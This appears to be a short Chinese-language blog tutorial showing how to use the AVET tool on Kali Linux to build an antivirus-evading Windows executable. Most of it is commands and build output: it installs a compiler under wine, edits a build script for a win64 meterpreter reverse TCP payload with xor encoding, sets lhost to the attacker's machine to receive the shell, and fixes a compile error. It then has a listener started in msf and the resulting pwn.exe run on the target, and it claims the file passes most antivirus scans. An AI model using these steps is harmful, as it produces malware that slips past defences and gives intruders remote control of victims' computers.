资源:https://github.com/govolution/avet
1、在kali上下载:https://sourceforge.net/projects/tdm-gcc/
root@kali:/tmp# wget -c --no-check-certificate https://nchc.dl.sourceforge.net/project/tdm-gcc/TDM-GCC%20Installer/tdm64-gcc-5.1.0-2.exe
2、安装
root@kali:/tmp# wine tdm64-gcc-5.1.0-2.exe
接下来默认选项,继续安装。
3、克隆需要的库
root@kali:/tmp# git clone https://github.com/govolution/avet
4、开始搞事情
root@kali:/tmp# cd avet/
root@kali:/tmp/avet# ls
win32就是指32位的,win64就是指64位的。一般情况,32位的比较保险一些。但不排除意外。
root@kali:/tmp/avet/build# leafpad build_win64_meterpreter_rev_tcp_xor_fopen.sh
lhost=192.168.111.130 #这个ip是你自己本机的ip,就是接受shell用的。
root@kali:/tmp/avet/build# cd ..
root@kali:/tmp/avet# ./build/build_win64_meterpreter_rev_tcp_xor_fopen.sh
。。。然后报错了,有点懵:
No Arch selected, selecting Arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 551 (iteration=0)
x64/xor chosen with final size 551
Payload size: 551 bytes
Final size of c file: 2339 bytes
./build/build_win64_meterpreter_rev_tcp_xor_fopen.sh: line 6: ./make_avet: cannot execute binary file: Exec format error
avet.c: In function 'main':
avet.c:122:15: error: 'buf' undeclared (first use in this function)
shellcode = buf;
^
avet.c:122:15: note: each undeclared identifier is reported only once for each function it appears in
————————————————
更新:2017年8月1日 09:35:40
有网友提到:
gcc -o make_avet make_avet.c
可以解决上面这个报错的问题。
————————————————
接下来就是用msf开启监听。在目标执行生成的那个exe文件,默认名字叫做pwn.exe,这个文件杀毒测试以后,基本都通过了。
要是有大佬做成功了,请发表一下看法。
附上视频讲解:传送门
更多资源:https://www.blackhat.com/asia-17/
